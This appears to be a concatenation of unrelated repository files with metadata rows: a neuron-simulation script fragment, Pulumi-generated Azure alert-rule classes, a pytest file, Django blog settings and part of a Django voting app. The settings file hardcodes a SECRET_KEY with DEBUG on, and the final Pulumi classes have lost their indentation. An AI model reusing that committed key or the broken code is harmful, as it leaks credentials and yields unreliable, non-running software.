    Vrev_inp=0*mV
    taurinp=0.1*ms
    taudinp=0.5*ms
    tauinp=taudinp
    Vhigh=0*mV
    Vlow=-80*mV
    ginp_IB=0* msiemens * cm **-2
    ginp=0* msiemens * cm **-2
    FS=NeuronGroup(1,eq_FS_LIP,threshold='V>-20*mvolt',refractory=3*ms,method='rk4')
    # Randomised initial conditions near rest.
    FS.V = '-110*mvolt+10*rand()*mvolt'
    FS.h = '0+0.05*rand()'
    FS.m = '0+0.05*rand()'
    FS.J='5 * uA * cmeter ** -2'
    V1=StateMonitor(FS,'V',record=[0])
    # I1=StateMonitor(FS,'IL',record=[0])
    # I2=StateMonitor(FS,'INa',record=[0])
    # I3=StateMonitor(FS,'IK',record=[0])
    run(1*second)
    figure()
    plot(V1.t/second,V1.V[0]/volt)
    xlabel('Time (s)')
    ylabel('Membrane potential (V)')
    title('FS cell')
    # figure()
    # plot(I1.t/second,I1.IL[0],label='L')
    # plot(I1.t/second,I2.INa[0],label='Na')
    # plot(I1.t/second,I3.IK[0],label='K')
    # plot(I1.t/second,I4.IAR[0],label='AR')
    # title('Synaptic currents')
    # legend()
"benpolletta@gmail.com"
] | benpolletta@gmail.com |
802828ec5275a0ef9b1ef8d1db094dfc9f3a6d36 | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/alertsmanagement/v20190505preview/outputs.py | 0da651342e6335cb50f421cf750b9e602f4b1fea | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,016 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
__all__ = [
'ActionGroupResponse',
'ConditionResponse',
'ConditionsResponse',
'DiagnosticsResponse',
'ScopeResponse',
'SuppressionConfigResponse',
'SuppressionResponse',
'SuppressionScheduleResponse',
]
@pulumi.output_type
class ActionGroupResponse(dict):
    """
    Action rule with action group configuration
    """
    # Auto-generated Pulumi output type; values are stored via pulumi.set and
    # read back via pulumi.get, so do not edit field handling by hand.
    def __init__(__self__, *,
                 action_group_id: str,
                 created_at: str,
                 created_by: str,
                 last_modified_at: str,
                 last_modified_by: str,
                 type: str,
                 conditions: Optional['outputs.ConditionsResponse'] = None,
                 description: Optional[str] = None,
                 scope: Optional['outputs.ScopeResponse'] = None,
                 status: Optional[str] = None):
        """
        Action rule with action group configuration
        :param str action_group_id: Action group to trigger if action rule matches
        :param str created_at: Creation time of action rule. Date-Time in ISO-8601 format.
        :param str created_by: Created by user name.
        :param str last_modified_at: Last updated time of action rule. Date-Time in ISO-8601 format.
        :param str last_modified_by: Last modified by user name.
        :param str type: Indicates type of action rule
               Expected value is 'ActionGroup'.
        :param 'ConditionsResponseArgs' conditions: conditions on which alerts will be filtered
        :param str description: Description of action rule
        :param 'ScopeResponseArgs' scope: scope on which action rule will apply
        :param str status: Indicates if the given action rule is enabled or disabled
        """
        pulumi.set(__self__, "action_group_id", action_group_id)
        pulumi.set(__self__, "created_at", created_at)
        pulumi.set(__self__, "created_by", created_by)
        pulumi.set(__self__, "last_modified_at", last_modified_at)
        pulumi.set(__self__, "last_modified_by", last_modified_by)
        pulumi.set(__self__, "type", 'ActionGroup')
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
        if status is not None:
            pulumi.set(__self__, "status", status)

    @property
    @pulumi.getter(name="actionGroupId")
    def action_group_id(self) -> str:
        """
        Action group to trigger if action rule matches
        """
        return pulumi.get(self, "action_group_id")

    @property
    @pulumi.getter(name="createdAt")
    def created_at(self) -> str:
        """
        Creation time of action rule. Date-Time in ISO-8601 format.
        """
        return pulumi.get(self, "created_at")

    @property
    @pulumi.getter(name="createdBy")
    def created_by(self) -> str:
        """
        Created by user name.
        """
        return pulumi.get(self, "created_by")

    @property
    @pulumi.getter(name="lastModifiedAt")
    def last_modified_at(self) -> str:
        """
        Last updated time of action rule. Date-Time in ISO-8601 format.
        """
        return pulumi.get(self, "last_modified_at")

    @property
    @pulumi.getter(name="lastModifiedBy")
    def last_modified_by(self) -> str:
        """
        Last modified by user name.
        """
        return pulumi.get(self, "last_modified_by")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        Indicates type of action rule
        Expected value is 'ActionGroup'.
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter
    def conditions(self) -> Optional['outputs.ConditionsResponse']:
        """
        conditions on which alerts will be filtered
        """
        return pulumi.get(self, "conditions")

    @property
    @pulumi.getter
    def description(self) -> Optional[str]:
        """
        Description of action rule
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter
    def scope(self) -> Optional['outputs.ScopeResponse']:
        """
        scope on which action rule will apply
        """
        return pulumi.get(self, "scope")

    @property
    @pulumi.getter
    def status(self) -> Optional[str]:
        """
        Indicates if the given action rule is enabled or disabled
        """
        return pulumi.get(self, "status")

    def _translate_property(self, prop):
        # Map camelCase wire names to snake_case Python property names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ConditionResponse(dict):
    """
    condition to trigger an action rule
    """
    # Auto-generated Pulumi output type; values are stored via pulumi.set and
    # read back via pulumi.get, so do not edit field handling by hand.
    def __init__(__self__, *,
                 operator: Optional[str] = None,
                 values: Optional[Sequence[str]] = None):
        """
        condition to trigger an action rule
        :param str operator: operator for a given condition
        :param Sequence[str] values: list of values to match for a given condition.
        """
        if operator is not None:
            pulumi.set(__self__, "operator", operator)
        if values is not None:
            pulumi.set(__self__, "values", values)

    @property
    @pulumi.getter
    def operator(self) -> Optional[str]:
        """
        operator for a given condition
        """
        return pulumi.get(self, "operator")

    @property
    @pulumi.getter
    def values(self) -> Optional[Sequence[str]]:
        """
        list of values to match for a given condition.
        """
        return pulumi.get(self, "values")

    def _translate_property(self, prop):
        # Map camelCase wire names to snake_case Python property names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ConditionsResponse(dict):
    """
    Conditions in alert instance to be matched for a given action rule. Default value is all. Multiple values could be provided with comma separation.
    """
    # Auto-generated Pulumi output type; values are stored via pulumi.set and
    # read back via pulumi.get, so do not edit field handling by hand.
    def __init__(__self__, *,
                 alert_context: Optional['outputs.ConditionResponse'] = None,
                 alert_rule_id: Optional['outputs.ConditionResponse'] = None,
                 description: Optional['outputs.ConditionResponse'] = None,
                 monitor_condition: Optional['outputs.ConditionResponse'] = None,
                 monitor_service: Optional['outputs.ConditionResponse'] = None,
                 severity: Optional['outputs.ConditionResponse'] = None,
                 target_resource_type: Optional['outputs.ConditionResponse'] = None):
        """
        Conditions in alert instance to be matched for a given action rule. Default value is all. Multiple values could be provided with comma separation.
        :param 'ConditionResponseArgs' alert_context: filter alerts by alert context (payload)
        :param 'ConditionResponseArgs' alert_rule_id: filter alerts by alert rule id
        :param 'ConditionResponseArgs' description: filter alerts by alert rule description
        :param 'ConditionResponseArgs' monitor_condition: filter alerts by monitor condition
        :param 'ConditionResponseArgs' monitor_service: filter alerts by monitor service
        :param 'ConditionResponseArgs' severity: filter alerts by severity
        :param 'ConditionResponseArgs' target_resource_type: filter alerts by target resource type
        """
        if alert_context is not None:
            pulumi.set(__self__, "alert_context", alert_context)
        if alert_rule_id is not None:
            pulumi.set(__self__, "alert_rule_id", alert_rule_id)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if monitor_condition is not None:
            pulumi.set(__self__, "monitor_condition", monitor_condition)
        if monitor_service is not None:
            pulumi.set(__self__, "monitor_service", monitor_service)
        if severity is not None:
            pulumi.set(__self__, "severity", severity)
        if target_resource_type is not None:
            pulumi.set(__self__, "target_resource_type", target_resource_type)

    @property
    @pulumi.getter(name="alertContext")
    def alert_context(self) -> Optional['outputs.ConditionResponse']:
        """
        filter alerts by alert context (payload)
        """
        return pulumi.get(self, "alert_context")

    @property
    @pulumi.getter(name="alertRuleId")
    def alert_rule_id(self) -> Optional['outputs.ConditionResponse']:
        """
        filter alerts by alert rule id
        """
        return pulumi.get(self, "alert_rule_id")

    @property
    @pulumi.getter
    def description(self) -> Optional['outputs.ConditionResponse']:
        """
        filter alerts by alert rule description
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter(name="monitorCondition")
    def monitor_condition(self) -> Optional['outputs.ConditionResponse']:
        """
        filter alerts by monitor condition
        """
        return pulumi.get(self, "monitor_condition")

    @property
    @pulumi.getter(name="monitorService")
    def monitor_service(self) -> Optional['outputs.ConditionResponse']:
        """
        filter alerts by monitor service
        """
        return pulumi.get(self, "monitor_service")

    @property
    @pulumi.getter
    def severity(self) -> Optional['outputs.ConditionResponse']:
        """
        filter alerts by severity
        """
        return pulumi.get(self, "severity")

    @property
    @pulumi.getter(name="targetResourceType")
    def target_resource_type(self) -> Optional['outputs.ConditionResponse']:
        """
        filter alerts by target resource type
        """
        return pulumi.get(self, "target_resource_type")

    def _translate_property(self, prop):
        # Map camelCase wire names to snake_case Python property names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class DiagnosticsResponse(dict):
    """
    Action rule with diagnostics configuration
    """
    # Auto-generated Pulumi output type; values are stored via pulumi.set and
    # read back via pulumi.get, so do not edit field handling by hand.
    def __init__(__self__, *,
                 created_at: str,
                 created_by: str,
                 last_modified_at: str,
                 last_modified_by: str,
                 type: str,
                 conditions: Optional['outputs.ConditionsResponse'] = None,
                 description: Optional[str] = None,
                 scope: Optional['outputs.ScopeResponse'] = None,
                 status: Optional[str] = None):
        """
        Action rule with diagnostics configuration
        :param str created_at: Creation time of action rule. Date-Time in ISO-8601 format.
        :param str created_by: Created by user name.
        :param str last_modified_at: Last updated time of action rule. Date-Time in ISO-8601 format.
        :param str last_modified_by: Last modified by user name.
        :param str type: Indicates type of action rule
               Expected value is 'Diagnostics'.
        :param 'ConditionsResponseArgs' conditions: conditions on which alerts will be filtered
        :param str description: Description of action rule
        :param 'ScopeResponseArgs' scope: scope on which action rule will apply
        :param str status: Indicates if the given action rule is enabled or disabled
        """
        pulumi.set(__self__, "created_at", created_at)
        pulumi.set(__self__, "created_by", created_by)
        pulumi.set(__self__, "last_modified_at", last_modified_at)
        pulumi.set(__self__, "last_modified_by", last_modified_by)
        pulumi.set(__self__, "type", 'Diagnostics')
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
        if status is not None:
            pulumi.set(__self__, "status", status)

    @property
    @pulumi.getter(name="createdAt")
    def created_at(self) -> str:
        """
        Creation time of action rule. Date-Time in ISO-8601 format.
        """
        return pulumi.get(self, "created_at")

    @property
    @pulumi.getter(name="createdBy")
    def created_by(self) -> str:
        """
        Created by user name.
        """
        return pulumi.get(self, "created_by")

    @property
    @pulumi.getter(name="lastModifiedAt")
    def last_modified_at(self) -> str:
        """
        Last updated time of action rule. Date-Time in ISO-8601 format.
        """
        return pulumi.get(self, "last_modified_at")

    @property
    @pulumi.getter(name="lastModifiedBy")
    def last_modified_by(self) -> str:
        """
        Last modified by user name.
        """
        return pulumi.get(self, "last_modified_by")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        Indicates type of action rule
        Expected value is 'Diagnostics'.
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter
    def conditions(self) -> Optional['outputs.ConditionsResponse']:
        """
        conditions on which alerts will be filtered
        """
        return pulumi.get(self, "conditions")

    @property
    @pulumi.getter
    def description(self) -> Optional[str]:
        """
        Description of action rule
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter
    def scope(self) -> Optional['outputs.ScopeResponse']:
        """
        scope on which action rule will apply
        """
        return pulumi.get(self, "scope")

    @property
    @pulumi.getter
    def status(self) -> Optional[str]:
        """
        Indicates if the given action rule is enabled or disabled
        """
        return pulumi.get(self, "status")

    def _translate_property(self, prop):
        # Map camelCase wire names to snake_case Python property names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ScopeResponse(dict):
    """
    Target scope for a given action rule. By default scope will be the subscription. User can also provide list of resource groups or list of resources from the scope subscription as well.
    """
    # Auto-generated Pulumi output type; values are stored via pulumi.set and
    # read back via pulumi.get, so do not edit field handling by hand.
    def __init__(__self__, *,
                 scope_type: Optional[str] = None,
                 values: Optional[Sequence[str]] = None):
        """
        Target scope for a given action rule. By default scope will be the subscription. User can also provide list of resource groups or list of resources from the scope subscription as well.
        :param str scope_type: type of target scope
        :param Sequence[str] values: list of ARM IDs of the given scope type which will be the target of the given action rule.
        """
        if scope_type is not None:
            pulumi.set(__self__, "scope_type", scope_type)
        if values is not None:
            pulumi.set(__self__, "values", values)

    @property
    @pulumi.getter(name="scopeType")
    def scope_type(self) -> Optional[str]:
        """
        type of target scope
        """
        return pulumi.get(self, "scope_type")

    @property
    @pulumi.getter
    def values(self) -> Optional[Sequence[str]]:
        """
        list of ARM IDs of the given scope type which will be the target of the given action rule.
        """
        return pulumi.get(self, "values")

    def _translate_property(self, prop):
        # Map camelCase wire names to snake_case Python property names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SuppressionConfigResponse(dict):
    """
    Suppression logic for a given action rule
    """
    # Auto-generated Pulumi output type; values are stored via pulumi.set and
    # read back via pulumi.get, so do not edit field handling by hand.
    def __init__(__self__, *,
                 recurrence_type: str,
                 schedule: Optional['outputs.SuppressionScheduleResponse'] = None):
        """
        Suppression logic for a given action rule
        :param str recurrence_type: Specifies when the suppression should be applied
        :param 'SuppressionScheduleResponseArgs' schedule: suppression schedule configuration
        """
        pulumi.set(__self__, "recurrence_type", recurrence_type)
        if schedule is not None:
            pulumi.set(__self__, "schedule", schedule)

    @property
    @pulumi.getter(name="recurrenceType")
    def recurrence_type(self) -> str:
        """
        Specifies when the suppression should be applied
        """
        return pulumi.get(self, "recurrence_type")

    @property
    @pulumi.getter
    def schedule(self) -> Optional['outputs.SuppressionScheduleResponse']:
        """
        suppression schedule configuration
        """
        return pulumi.get(self, "schedule")

    def _translate_property(self, prop):
        # Map camelCase wire names to snake_case Python property names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SuppressionResponse(dict):
"""
Action rule with suppression configuration
"""
def __init__(__self__, *,
created_at: str,
created_by: str,
last_modified_at: str,
last_modified_by: str,
suppression_config: 'outputs.SuppressionConfigResponse',
type: str,
conditions: Optional['outputs.ConditionsResponse'] = None,
description: Optional[str] = None,
scope: Optional['outputs.ScopeResponse'] = None,
status: Optional[str] = None):
"""
Action rule with suppression configuration
:param str created_at: Creation time of action rule. Date-Time in ISO-8601 format.
:param str created_by: Created by user name.
:param str last_modified_at: Last updated time of action rule. Date-Time in ISO-8601 format.
:param str last_modified_by: Last modified by user name.
:param 'SuppressionConfigResponseArgs' suppression_config: suppression configuration for the action rule
:param str type: Indicates type of action rule
Expected value is 'Suppression'.
:param 'ConditionsResponseArgs' conditions: conditions on which alerts will be filtered
:param str description: Description of action rule
:param 'ScopeResponseArgs' scope: scope on which action rule will apply
:param str status: Indicates if the given action rule is enabled or disabled
"""
pulumi.set(__self__, "created_at", created_at)
pulumi.set(__self__, "created_by", created_by)
pulumi.set(__self__, "last_modified_at", last_modified_at)
pulumi.set(__self__, "last_modified_by", last_modified_by)
pulumi.set(__self__, "suppression_config", suppression_config)
pulumi.set(__self__, "type", 'Suppression')
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if description is not None:
pulumi.set(__self__, "description", description)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> str:
"""
Creation time of action rule. Date-Time in ISO-8601 format.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter(name="createdBy")
def created_by(self) -> str:
"""
Created by user name.
"""
return pulumi.get(self, "created_by")
@property
@pulumi.getter(name="lastModifiedAt")
def last_modified_at(self) -> str:
"""
Last updated time of action rule. Date-Time in ISO-8601 format.
"""
return pulumi.get(self, "last_modified_at")
@property
@pulumi.getter(name="lastModifiedBy")
def last_modified_by(self) -> str:
"""
Last modified by user name.
"""
return pulumi.get(self, "last_modified_by")
@property
@pulumi.getter(name="suppressionConfig")
def suppression_config(self) -> 'outputs.SuppressionConfigResponse':
"""
suppression configuration for the action rule
"""
return pulumi.get(self, "suppression_config")
@property
@pulumi.getter
def type(self) -> str:
"""
Indicates type of action rule
Expected value is 'Suppression'.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def conditions(self) -> Optional['outputs.ConditionsResponse']:
"""
conditions on which alerts will be filtered
"""
return pulumi.get(self, "conditions")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
Description of action rule
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def scope(self) -> Optional['outputs.ScopeResponse']:
"""
scope on which action rule will apply
"""
return pulumi.get(self, "scope")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
Indicates if the given action rule is enabled or disabled
"""
return pulumi.get(self, "status")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SuppressionScheduleResponse(dict):
"""
Schedule for a given suppression configuration.
"""
def __init__(__self__, *,
end_date: Optional[str] = None,
end_time: Optional[str] = None,
recurrence_values: Optional[Sequence[int]] = None,
start_date: Optional[str] = None,
start_time: Optional[str] = None):
"""
Schedule for a given suppression configuration.
:param str end_date: End date for suppression
:param str end_time: End date for suppression
:param Sequence[int] recurrence_values: Specifies the values for recurrence pattern
:param str start_date: Start date for suppression
:param str start_time: Start time for suppression
"""
if end_date is not None:
pulumi.set(__self__, "end_date", end_date)
if end_time is not None:
pulumi.set(__self__, "end_time", end_time)
if recurrence_values is not None:
pulumi.set(__self__, "recurrence_values", recurrence_values)
if start_date is not None:
pulumi.set(__self__, "start_date", start_date)
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
@property
@pulumi.getter(name="endDate")
def end_date(self) -> Optional[str]:
"""
End date for suppression
"""
return pulumi.get(self, "end_date")
@property
@pulumi.getter(name="endTime")
def end_time(self) -> Optional[str]:
"""
End date for suppression
"""
return pulumi.get(self, "end_time")
@property
@pulumi.getter(name="recurrenceValues")
def recurrence_values(self) -> Optional[Sequence[int]]:
"""
Specifies the values for recurrence pattern
"""
return pulumi.get(self, "recurrence_values")
@property
@pulumi.getter(name="startDate")
def start_date(self) -> Optional[str]:
"""
Start date for suppression
"""
return pulumi.get(self, "start_date")
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[str]:
"""
Start time for suppression
"""
return pulumi.get(self, "start_time")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
| [
"noreply@github.com"
] | MisinformedDNA.noreply@github.com |
3c7cc2fd0685ea1563de87c1073126f4aa463a33 | 3fa613a340292b852aa083921f43a640d5e80e8f | /day_4/test_advent_coins.py | 27a737ce195e7875b2bc552644dd21c836ae6f0e | [] | no_license | arseny-tsyro/advent_of_code_python | e7e91d28aaaf98655af570f1e30d3c71b374c733 | 09b9a474974da96c3787ab655e04fb24dcaa7dae | refs/heads/master | 2016-08-12T03:32:51.184955 | 2015-12-14T12:35:49 | 2015-12-14T12:35:56 | 47,346,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 249 | py | import pytest
from day_4.advent_coins import *
@pytest.mark.parametrize("secret_key, expected", [
("abcdef", 609043),
("pqrstuv", 1048970)
])
def test_mine(secret_key, expected):
result = mine(secret_key)
assert result == expected
| [
"arseny-tsyro@ya.ru"
] | arseny-tsyro@ya.ru |
db52871b54ababab237eabf4d0ff0d605983ac6e | df7d6a55af3c6b9fbb39079a438ac9a6f67666de | /learning_site/settings.py | 2041e6362523271c092786856056b12808566dbf | [] | no_license | Leziak/Django-Blog- | 5845ead35f1fac9cefc834fa22c8da7119bbee60 | 428ac6a8a102d2484337465ac2d44a237f2fdc9d | refs/heads/master | 2020-04-01T08:02:16.313365 | 2018-10-14T20:14:07 | 2018-10-14T20:14:07 | 153,014,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,348 | py | """
Django settings for learning_site project.
Generated by 'django-admin startproject' using Django 2.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'vhhzeatdyvfzn*0cb047*vsed%3^tac51(#0s*(-&hjzj$yu9m'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'blog.apps.BlogConfig',
'users.apps.UsersConfig',
'crispy_forms',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'learning_site.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'learning_site.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
CRISPY_TEMPLATE_PACK = 'bootstrap4'
LOGIN_REDIRECT_URL = 'blog-home'
LOGIN_URL = 'login'
| [
"samo.majoros@gmail.com"
] | samo.majoros@gmail.com |
338d236cc4b9f3b36095c2d96499851af1f4b6e3 | fc837a86b004d5d6753c51b5ecef9322d37464de | /votee/views.py | 353d2a13596836d529588f2937f2212e2b1a0685 | [] | no_license | matfystutor/tutorgf | 05c9c2da6b58c27f3bf62ccf88ce789dc31e251b | 5656c066721db4323aa3a05e57ab613a5effb1c5 | refs/heads/master | 2023-01-11T05:25:32.176317 | 2020-11-02T15:57:18 | 2020-11-02T15:57:18 | 309,121,186 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 18,803 | py | import datetime
import json
import time
from django import forms
from django.http import Http404, HttpResponseForbidden, HttpResponseRedirect
from django.template.defaultfilters import slugify
from django.urls import reverse
from django.utils import timezone
from django.views.generic import FormView, TemplateView
from votee import models
class SingleElectionMixin:
    """Mixin for views whose URL names a single election via the 'election' kwarg."""
    def get_election(self) -> models.Election:
        """Look up the election named in the URL, raising Http404 on a miss."""
        slug = self.kwargs["election"]
        try:
            election = models.Election.objects.get(slug=slug)
        except models.Election.DoesNotExist:
            raise Http404
        return election
class SinglePollMixin(SingleElectionMixin):
    """Mixin for views addressing one poll ('election' and 'poll' URL kwargs)."""
    def get_poll(self) -> models.Poll:
        """Look up the poll named in the URL, raising Http404 on a miss.

        Bug fix: the except clause previously read
        ``models.models.Poll.DoesNotExist``; evaluating that raises
        AttributeError instead of converting a missing poll into a 404.
        The sibling ``SingleElectionMixin`` shows the intended spelling.
        """
        try:
            return models.Poll.objects.get(
                election__slug=self.kwargs["election"], slug=self.kwargs["poll"]
            )
        except models.Poll.DoesNotExist:
            raise Http404
class ElectionCreateForm(forms.Form):
    """Form for creating an election together with an optional batch of polls.

    ``polls`` accepts either a JSON object mapping poll names to lists of
    option names, or a plain-text outline: poll-name lines with their options
    indented underneath (the literal option ``(blank)`` becomes a blank vote).
    """
    name = forms.CharField()
    polls = forms.CharField(
        required=False,
        widget=forms.Textarea,
    )
    def clean_polls(self):
        """Parse the ``polls`` text into unsaved Poll/PollOption instances.

        Returns a ``(polls, options)`` pair of *unsaved* model instances; the
        view persists them.  Malformed input raises ``forms.ValidationError``
        so it surfaces as a normal form error instead of a 500 (the previous
        bare ``Exception``/``assert`` calls crashed the request).
        """
        v = self.cleaned_data["polls"]
        if not v.strip():
            return [], []
        polls = []
        options = []
        if v.strip().startswith("{"):
            # JSON form: {"Poll name": ["option", ...], ...}
            try:
                parsed = json.loads(v)
            except ValueError as exc:
                raise forms.ValidationError("Invalid JSON: %s" % exc)
            for poll_name, option_names in parsed.items():
                if not isinstance(poll_name, str) or not isinstance(option_names, list):
                    raise forms.ValidationError(
                        "JSON must map poll names to lists of option names"
                    )
                p = models.Poll(name=poll_name, slug=slugify(poll_name))
                polls.append(p)
                for n in option_names:
                    if not isinstance(n, str):
                        raise forms.ValidationError("Option names must be strings")
                    options.append(models.PollOption(poll=p, name=n))
        else:
            # Outline form: unindented lines name polls, indented lines options.
            for line in v.splitlines():
                if not line.strip():
                    continue
                indented = line.lstrip() != line
                if indented:
                    if not polls:
                        raise forms.ValidationError(
                            "Indented line without a leading poll name"
                        )
                    name = "" if line.strip() == "(blank)" else line.strip()
                    options.append(models.PollOption(poll=polls[-1], name=name))
                else:
                    # Before starting a new poll, the previous one must have
                    # received at least one option.
                    if polls and (not options or options[-1].poll is not polls[-1]):
                        raise forms.ValidationError("Poll with no options")
                    name = line.strip()
                    polls.append(models.Poll(name=name, slug=slugify(name)))
        if not polls:
            raise forms.ValidationError("No polls")
        if not options or options[-1].poll is not polls[-1]:
            raise forms.ValidationError("Poll with no options")
        return polls, options
class ElectionCreate(FormView):
    """Superuser-only view that creates an election plus its initial polls."""
    template_name = "votee/election_create.html"
    form_class = ElectionCreateForm
    def form_valid(self, form):
        """Create the election and its polls/options, then redirect to admin."""
        # Permission is checked here (not in dispatch) so the failure renders
        # as a form error rather than a 403 page.
        if not self.request.user.is_superuser:
            form.add_error(None, "You must be a superuser to create a new election")
            return self.form_invalid(form)
        polls, options = form.cleaned_data["polls"]
        e = models.Election.objects.create(
            name=form.cleaned_data["name"],
            slug=slugify(form.cleaned_data["name"]),
        )
        for p in polls:
            p.election = e
            p.save()
        for o in options:
            # Re-assigning the FK refreshes poll_id now that the poll has a
            # primary key (it was unsaved when the option was built).
            # NOTE(review): presumably required on the Django version in use —
            # confirm before removing this seemingly redundant line.
            o.poll = o.poll
            o.save()
        # Redirect straight into the admin page with a valid admin key.
        url = (
            reverse("election_admin", kwargs={"election": e.slug})
            + "?a="
            + e.get_admin_key()
        )
        return HttpResponseRedirect(url)
class ElectionDetail(TemplateView, SingleElectionMixin):
    """Public read-only page for a single election; the template does the work."""
    template_name = "votee/election_detail.html"
class ElectionAdmin(FormView, SingleElectionMixin):
    """Admin page for one election: rename it, reorder/add/delete its polls.

    Access requires the election's admin key (``?a=``); superusers without a
    key are redirected to a URL carrying a fresh one.
    """
    template_name = "votee/election_admin.html"
    def dispatch(self, request, *args, **kwargs):
        """Gate every request on a valid admin key before normal dispatch."""
        self.args = args
        self.kwargs = kwargs
        self.election = self.get_election()
        key = self.request.GET.get("a") or ""
        if not self.election.validate_admin_key(key):
            if request.user.is_superuser:
                # Superusers get bounced to a URL that includes a valid key.
                url = (
                    reverse("election_admin", kwargs={"election": self.election.slug})
                    + "?a="
                    + self.election.get_admin_key()
                )
                return HttpResponseRedirect(url)
            return HttpResponseForbidden("<h1>Invalid admin key</h1>")
        return super().dispatch(request, *args, **kwargs)
    def get_form(self) -> forms.Form:
        """Build a dynamic form with one row of fields per existing poll.

        Side effect: records ``self.rows`` as (poll, field-name, ...) tuples
        so ``get_context_data``/``form_valid`` can map fields back to polls.
        """
        self.election = self.get_election()
        self.polls = self.election.polls()
        f = forms.Form(**self.get_form_kwargs())
        f.fields["name"] = forms.CharField(
            initial=self.election.name,
        )
        self.rows = []
        for i, p in enumerate(self.polls):
            prefix = f"p{p.id}_"
            f.fields[prefix + "order"] = forms.IntegerField(
                initial=i + 1,
            )
